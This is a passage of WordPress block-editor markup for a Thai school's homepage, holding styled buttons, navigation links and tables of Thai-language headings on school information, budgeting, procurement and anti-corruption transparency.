200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":757,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/1-1.png\" alt=\"\" class=\"wp-image-757\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllP